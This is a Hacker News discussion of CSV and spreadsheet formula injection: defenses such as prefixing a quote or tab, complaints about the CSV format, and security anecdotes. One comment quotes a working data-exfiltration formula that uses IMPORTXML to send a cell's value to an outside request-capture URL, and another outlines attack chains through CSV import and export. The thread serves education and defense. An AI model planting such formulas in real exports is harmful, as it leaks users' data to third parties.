top | item 15438894

Dangers of CSV Injection

645 points | rpenm | 8 years ago | georgemauer.net

188 comments

[+] Dylan16807|8 years ago|reply
> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

> Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.
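A minimal sketch (mine, not from the thread) of the apostrophe-prefix defense in Python; the `sanitize_cell` helper and the trigger list are illustrative, and as a reply below notes, Excel's own CSV export drops the quote again, so this only protects the first open:

```python
import csv
import io

# Characters the parent comment identifies as formula triggers.
TRIGGERS = ("=", "-", "+", "@")

def sanitize_cell(value):
    """Prefix formula-triggering cells with a single quote so the
    spreadsheet treats them as text rather than as a formula."""
    text = str(value)
    return "'" + text if text.startswith(TRIGGERS) else text

buf = io.StringIO()
csv.writer(buf).writerow([sanitize_cell(c) for c in ["id", "=SUM(A1:A10)", 42]])
print(buf.getvalue())  # id,'=SUM(A1:A10),42
```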

[+] autra|8 years ago|reply
> The documented way is prefixing with a ' character. It doesn't have the length issue either.

It is suggested in the comments, but the author answered:

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.

:-/

[+] ballenf|8 years ago|reply
Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.

Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.

In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.
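For what it's worth, this matches the default behavior of Python's `csv` module, whose QUOTE_MINIMAL mode quotes a field only when it contains the delimiter, the quote character, or a line break (a sketch of my own, not from the comment):

```python
import csv
import io

buf = io.StringIO()
# QUOTE_MINIMAL (the default) quotes only fields containing the
# delimiter, the quote character, or a newline.
writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL)
writer.writerow(["plain", "has,comma", 'has"quote'])
print(buf.getvalue())  # plain,"has,comma","has""quote"
```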

[+] cturner|8 years ago|reply
"transfer a series of values between applications that apply different types to those values and applications that don't"

If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject them.

Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.

At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or a persistence format. Another case that happens regularly: (1) a developer builds a database as a storage mechanism; (2) the developer decides to have other, separate codebases query into that database. Is the database an application data structure (internal) or an API (external)? It is acting as both.

[+] mulmen|8 years ago|reply
The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.
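A hedged illustration of the difference: a typed interchange format such as JSON carries the type with the value, while CSV flattens everything to text (the field names here are made up):

```python
import json

# A leading-zero identifier and a quantity look identical in CSV ("00123,123"),
# but JSON keeps the string/number distinction explicit.
record = {"upc": "00123", "qty": 123}
decoded = json.loads(json.dumps(record))
print(type(decoded["upc"]).__name__, type(decoded["qty"]).__name__)  # str int
```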
[+] fulafel|8 years ago|reply
I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.
[+] jdelStrother|8 years ago|reply
That's just a single regular apostrophe? At least on my machine, with Mac Excel 15.38, if I have a CSV containing:

1,foo,'=SUM(A1:A10),bar

and open it, then the single apostrophe is visible in the cell.

[+] pavel_lishin|8 years ago|reply
Excel is the source of so many problems. At work, we ask users for input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers, such as UPCs, show up in Excel in scientific notation, being big scary numbers, and also get exported as such.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.
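The precision loss is easy to reproduce without Excel: once a 12-digit UPC has been through scientific notation, the trailing digits are unrecoverable (an illustrative sketch):

```python
upc = 123456123456                  # the value typed into the cell
exported = "1.23456E+11"            # what the CSV export emits
recovered = int(float(exported))    # best a downstream parser can do
print(recovered)                    # 123456000000
print(recovered == upc)             # False: the last six digits are gone
```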

[+] datenwolf|8 years ago|reply
The thing that puzzles me the most is that people use _C_SV at all: separation by comma, or by any other member of the printable subset of ASCII, in the first place. What this essentially boils down to is ambiguous in-band signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).
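A sketch of what an ASV round-trip could look like (the function names are mine, not a standard library):

```python
US = "\x1f"  # ASCII Unit Separator: between fields
RS = "\x1e"  # ASCII Record Separator: between records

def dump_asv(rows):
    # No quoting or escaping needed, as long as payloads contain no control codes.
    return RS.join(US.join(fields) for fields in rows)

def load_asv(data):
    return [record.split(US) for record in data.split(RS)]

rows = [["name", "note"], ["Doe, Jane", 'says "hi"']]
# Commas and quotes in the data need no special handling at all.
assert load_asv(dump_asv(rows)) == rows
```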

[+] burntsushi|8 years ago|reply
This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.
[+] davedx|8 years ago|reply
The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

Sure, if you're building some kind of system where you need to ingest data from one application from another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.

[+] ajdlinux|8 years ago|reply
Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.
[+] eli|8 years ago|reply
I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.

If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.

[+] baldfat|8 years ago|reply
I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans it into a PDF, ugh. I had one vendor that deliberately made the data available only in a mangled ASCII format that would take me 600+ lines of code to clean up.

I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?

I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.

[+] sbierwagen|8 years ago|reply
If a dev is going to use a weirdo non-CSV data interchange format, they would just use XLSX or JSON or etc etc etc.

"ASV" is only a viable option if you then also use your time machine to go back 40 years and make everyone start using it then.

[+] thepompano|8 years ago|reply
This might create some integration-related hiccups with XML, as most ASCII control characters are forbidden per the XML 1.0/1.1 specs.
[+] bitexploder|8 years ago|reply
I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column names... schema injection, like SQLi only more hilarious)

Point is, apps and devs can have blind spots (knowledge gaps), or they just don't think of a CSV import or export like other functionality.

[+] e1g|8 years ago|reply
We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.
[+] IncRnd|8 years ago|reply
"Input is evil" is a pretty good maxim to follow.
[+] kristofferR|8 years ago|reply
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.

[+] erik_seaberg|8 years ago|reply
A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).
[+] seszett|8 years ago|reply
> Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons

Semicolons are really better though, because unlike commas they aren't used as a decimal separator in most countries.

I don't know about Excel, but LibreOffice makes it very easy to select which parameters to use when opening a CSV file; it works just fine.

[+] pvdebbe|8 years ago|reply
The only good CSV dialect is the differently named DSV (Delimiter Separated Values), where you support just one delimiter and require escaping of the delimiter character inside values. It's simple, and it works. Quotes are hard to parse, so don't use those. Just \escape.

http://www.catb.org/esr/writings/taoup/html/ch05s02.html
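A rough sketch of such an escape-based DSV, using `:` as the single delimiter (the names and the choice of delimiter are illustrative, not from the linked chapter):

```python
DELIM = ":"

def encode_field(s):
    # Escape the escape character first, then the delimiter.
    return s.replace("\\", "\\\\").replace(DELIM, "\\" + DELIM)

def decode_record(line):
    fields, cur, chars = [], [], iter(line)
    for ch in chars:
        if ch == "\\":
            cur.append(next(chars, ""))  # take the next character literally
        elif ch == DELIM:
            fields.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    fields.append("".join(cur))
    return fields

record = ["a:b", "c\\d", "plain"]
line = DELIM.join(encode_field(f) for f in record)
assert decode_record(line) == record  # round-trips with no quoting rules
```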

[+] Raticide|8 years ago|reply
What's a good alternative non-proprietary format that all major spreadsheet software supports?
[+] splike|8 years ago|reply
Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13...

[+] jkabrg|8 years ago|reply
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things:

* Human readable.

* Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.
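The empty-field ambiguity can be seen with nothing more than the stdlib: an empty string and a missing value serialize identically, so every reader has to guess (a small demonstration of my own):

```python
import csv
import io

# "" and None serialize to the same thing: nothing between two commas.
row = ["alice", "", None]
buf = io.StringIO()
csv.writer(buf).writerow(row)
print(repr(buf.getvalue()))  # 'alice,,\r\n'

back = next(csv.reader(io.StringIO(buf.getvalue())))
print(back)  # ['alice', '', ''] -- the None is indistinguishable from ""
```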

[+] kqr|8 years ago|reply
See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.

The thing you use CSV for is not its technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

[+] johnwilkesbooth|8 years ago|reply
> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, whereas categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.

[+] f00_|8 years ago|reply
.parquet fam, it's all about columnar data stores now
[+] fulafel|8 years ago|reply
This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?

[+] top_post|8 years ago|reply
Sorry to balk, but I'm more outraged at the title: yet another "injection" that isn't really the case. The root cause is the interpreter executing untrusted input; the same can be said about macros or any other file type. The perception is that most people open CSV files on a regular basis and assume they are safe, or at least not interpreted, when it appears they are.
[+] bitexploder|8 years ago|reply
Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.

This one is: your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse... it is a long, complex story that we can sweep up into that generalization. But it is important to know the high, medium, and low levels of these issues. They form a gigantic tree. The medium level, somewhere in between, is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not its various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can understand a side channel generically quite easily, but it takes a ton of specific hard-earned knowledge to avoid one.

[+] Cyranix|8 years ago|reply
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.

https://bugcrowd.com/socrata

(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)

[+] Swizec|8 years ago|reply
This brings XSS to a whole new level. Imagine what happens if you know that some of what you post to a website as a user eventually gets reviewed by somebody who receives it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

[+] _betty_|8 years ago|reply
This used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained HTML and display the HTML instead; it could then pull in a secret Silverlight file that was masquerading as a docx file, since they are both simply zip files. Even more amusingly, Silverlight and docx contents don't clash, so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering HTML with a hidden Silverlight app.
[+] Mortiffer|8 years ago|reply
In case anyone else was wondering about Google Forms: I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field and Google automatically appends a "'" such that '=IMPORTXML does not execute.
[+] jaclaz|8 years ago|reply
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.

A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".
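Producing TSV instead of CSV is trivial with most CSV libraries; a Python sketch (the sample data is made up):

```python
import csv
import io

buf = io.StringIO()
# Tab-delimited output: commas in the data no longer need quoting.
writer = csv.writer(buf, delimiter="\t")
writer.writerow(["id", "descrizione"])
writer.writerow(["1", "1.234,56 (valore con virgola)"])
print(buf.getvalue())
```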

[+] captn3m0|8 years ago|reply
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

> CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should be mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather than when creating them.

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/cs...

Their policy makes it sound like the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all).

[+] jonnycomputer|8 years ago|reply
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
[+] filereaper|8 years ago|reply
I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into data warehouses (e.g. Redshift, Greenplum, etc.) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV, and it's easy to inspect visually compared to more efficient binary formats like ORC or Parquet.

[+] tatersolid|8 years ago|reply
Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over with bugs and inconsistencies for all time.

Use anything else, even XLSX which is at least a typed and openly standardized format.

[+] stepri|8 years ago|reply
When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.
[+] ecesena|8 years ago|reply
Does anybody know a good library that solves this problem, in any language?
[+] ComodoHacker|8 years ago|reply
My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?
[+] randkyp|8 years ago|reply
As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've been only able to open CSVs by manually importing them with Excel's 'import data from text file' function.
[+] tyingq|8 years ago|reply
It does depend on using the csv file extension. Anything else brings up the import wizard.